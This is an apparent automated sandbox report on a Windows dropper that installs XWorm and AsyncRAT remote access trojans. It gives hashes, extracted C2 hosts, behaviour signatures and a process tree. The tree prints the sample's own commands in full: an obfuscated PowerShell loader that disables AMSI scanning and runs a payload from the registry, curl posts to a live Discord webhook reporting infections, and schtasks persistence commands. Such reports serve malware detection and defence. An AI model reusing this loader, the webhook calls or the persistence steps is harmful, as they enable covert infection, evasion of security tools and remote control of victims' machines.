Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-06-2024 05:30

General

  • Target

    Dropper.exe

  • Size

    1.4MB

  • MD5

    0db5ce13fa3f2058572801bbffcaa3f3

  • SHA1

    49580b807ee8e9a7bd4b7a045ceec6c93ae093dd

  • SHA256

    9639537e3aa2c1d7866a72856656b9afa4e6c761d7c6ae43a78e1075b38f3b8b

  • SHA512

    a46cbf5da20f09e514590e7de8f8e932427b15060724cd716c38e9e6b232003bcdf01db6dcf06300459c0386a7f3bbc2c6c354b578792e8b2ec13de4d1414f4b

  • SSDEEP

    12288:B0w1hc0Q53LOAGkjwtBx5n4AYakafNh/ymPj/YDLm7GylDULvEd8oK/mngAmgIv:BrmwDRPjwuB

Malware Config

Extracted

Family

xworm

C2

politics-fiber.gl.at.ply.gg:47430

Attributes
  • Install_directory

    %AppData%

  • install_file

    $77-scchost.exe

Extracted

Family

asyncrat

Botnet

Default

C2

environmental-blank.gl.at.ply.gg:25944

Attributes
  • delay

    1

  • install

    true

  • install_file

    $77-aachost.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Xworm Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops file in System32 directory 17 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 26 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 15 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:336
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{f614ee01-1833-4b08-a8d2-1e1ad2f440cb}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4740
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:668
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:956
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:532
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:996
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                • Drops file in System32 directory
                PID:1060
                • C:\Windows\system32\taskhostw.exe
                  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                  2⤵
                    PID:2824
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:yUJYGBYTuIbl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$pPIVggVPTXqYse,[Parameter(Position=1)][Type]$kRrPbdVbzW)$VwSumcJpZJk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+'e'+'d'+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+'M'+''+'o'+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+''+'T'+'yp'+[Char](101)+'',''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+'s'+''+','+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+'S'+'e'+''+'a'+''+'l'+''+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+'u'+''+[Char](116)+''+[Char](111)+'Cl'+'a'+''+'s'+'s',[MulticastDelegate]);$VwSumcJpZJk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+'am'+'e'+''+[Char](44)+'Hi'+[Char](100)+''+'e'+'B'+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$pPIVggVPTXqYse).SetImplementationFlags('R'+'u'+''+'n'+'ti'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+[Char](97)+''+'g'+'ed');$VwSumcJpZJk.DefineMethod('I'+'n'+''+'v'+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+','+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+''+'t'+','+'V'+''+[Char](105)+'r'+'t'+''+[Char](117)+'a'+'l'+'',$kRrPbdVbzW,$pPIVggVPTXqYse).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $VwSumcJpZJk.CreateType();}$DyWJSxRKyGrzg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+'d'+'ll')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+'n'+[Char](115)+'a'+'f'+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+'i'+'v'+''+[Char](101)+''+'M'+''+[Char](101)+'th'+[Char](111)+'ds');$FpHTJhMNmQJGZM=$DyWJSxRKyGrzg.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+'r'+[Char](111)+''+[Char](99)+'Ad'+'d'+'r'+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EqOBQYHdnGfBjVxWHCG=yUJYGBYTuIbl @([String])([IntPtr]);$EWyYavpQmdhLSDkNbSyZIW=yUJYGBYTuIbl @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pJwOZzceRHe=$DyWJSxRKyGrzg.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'Mod'+[Char](117)+''+'l'+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$vmcsjinuyKrLqb=$FpHTJhMNmQJGZM.Invoke($Null,@([Object]$pJwOZzceRHe,[Object](''+'L'+'oa'+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$ePtXapweUYqgUHpiq=$FpHTJhMNmQJGZM.Invoke($Null,@([Object]$pJwOZzceRHe,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+'l'+[Char](80)+''+'r'+'o'+'t'+''+'e'+''+[Char](99)+''+[Char](116)+'')));$JkQSrlI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vmcsjinuyKrLqb,$EqOBQYHdnGfBjVxWHCG).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+''+'.'+'d'+[Char](108)+'l');$fOySBwUwbbICEGpIg=$FpHTJhMNmQJGZM.Invoke($Null,@([Object]$JkQSrlI,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+'i'+''+'S'+'c'+[Char](97)+'n'+'B'+''+[Char](117)+''+[Char](102)+'f'+'e'+'r')));$BAUwsnQOoG=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ePtXapweUYqgUHpiq,$EWyYavpQmdhLSDkNbSyZIW).Invoke($fOySBwUwbbICEGpIg,[uint32]8,4,[ref]$BAUwsnQOoG);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fOySBwUwbbICEGpIg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ePtXapweUYqgUHpiq,$EWyYavpQmdhLSDkNbSyZIW).Invoke($fOySBwUwbbICEGpIg,[uint32]8,0x20,[ref]$BAUwsnQOoG);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+'$'+'7'+[Char](55)+''+[Char](115)+'t'+[Char](97)+''+'g'+'er')).EntryPoint.Invoke($Null,$Null)"
                    2⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Drops file in System32 directory
                    • Suspicious use of SetThreadContext
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:3236
                  • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                    C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                    2⤵
                    • Executes dropped EXE
                    PID:1204
                  • C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                    C:\Users\Admin\AppData\Roaming\$77-scchost.exe
                    2⤵
                    • Executes dropped EXE
                    PID:3788
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1112
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1132
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                      • Drops file in System32 directory
                      PID:1228
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1252
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1372
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                          1⤵
                            PID:1416
                            • C:\Windows\system32\sihost.exe
                              sihost.exe
                              2⤵
                                PID:2628
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                              1⤵
                                PID:1436
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1444
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                  1⤵
                                    PID:1452
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                    1⤵
                                      PID:1564
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1628
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1672
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1760
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1796
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1880
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1892
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1900
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:1952
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1972
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:1592
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2072
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2204
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2272
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2508
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2516
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                  1⤵
                                                                    PID:2672
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2776
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                      PID:2804
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2836
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2860
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2880
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                            1⤵
                                                                              PID:2944
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3092
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3396
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Modifies registry class
                                                                                  • Suspicious behavior: AddClipboardFormatListener
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:3456
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Dropper.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
                                                                                    2⤵
                                                                                    • Checks computer location settings
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:3556
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      3⤵
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:3484
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                                                                                      3⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:3348
                                                                                      • C:\Windows\SysWOW64\curl.exe
                                                                                        curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                                                                                        4⤵
                                                                                          PID:4884
                                                                                      • C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
                                                                                        3⤵
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3656
                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"
                                                                                          4⤵
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:2612
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            5⤵
                                                                                              PID:3008
                                                                                        • C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
                                                                                          3⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4008
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
                                                                                            4⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:464
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
                                                                                              5⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:2196
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3F0C.tmp.bat""
                                                                                            4⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2336
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              5⤵
                                                                                                PID:440
                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                timeout 3
                                                                                                5⤵
                                                                                                • Delays execution with timeout.exe
                                                                                                PID:4424
                                                                                          • C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:2764
                                                                                          • C:\Users\Admin\AppData\Local\Temp\$77-install.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:3764
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""System.IO.DirectoryNotFoundException: Could not find a part of the path 'C:\Users\Admin\AppData\Local\Temp\%userprofile%\test.exe'. at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath) at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost) at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost) at System.IO.StreamWriter.CreateFile(String path, Boolean append, Boolean checkHost) at System.IO.StreamWriter..ctor(String path, Boolean append, Encoding encoding, Int32 bufferSize, Boolean checkHost) at System.IO.StreamWriter..ctor(String path, Boolean append, Encoding encoding) at Dropper.Dropping.Main()"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
                                                                                            3⤵
                                                                                              PID:1048
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                4⤵
                                                                                                  PID:1040
                                                                                                • C:\Windows\SysWOW64\curl.exe
                                                                                                  curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""System.IO.DirectoryNotFoundException: Could not find a part of the path 'C:\Users\Admin\AppData\Local\Temp\C:\Users\Admin\test.exe'.
                                                                                                  4⤵
                                                                                                    PID:608
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                              1⤵
                                                                                                PID:3636
                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                1⤵
                                                                                                  PID:3824
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                  • Suspicious use of UnmapMainImage
                                                                                                  PID:3988
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  • Modifies registry class
                                                                                                  PID:3672
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                  1⤵
                                                                                                    PID:1804
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                    1⤵
                                                                                                      PID:3940
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                      1⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:880
                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                      1⤵
                                                                                                      • Drops file in System32 directory
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:4540
                                                                                                    • C:\Windows\system32\SppExtComObj.exe
                                                                                                      C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:5024
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                        1⤵
                                                                                                          PID:1080
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                          1⤵
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:4376
                                                                                                        • C:\Windows\system32\DllHost.exe
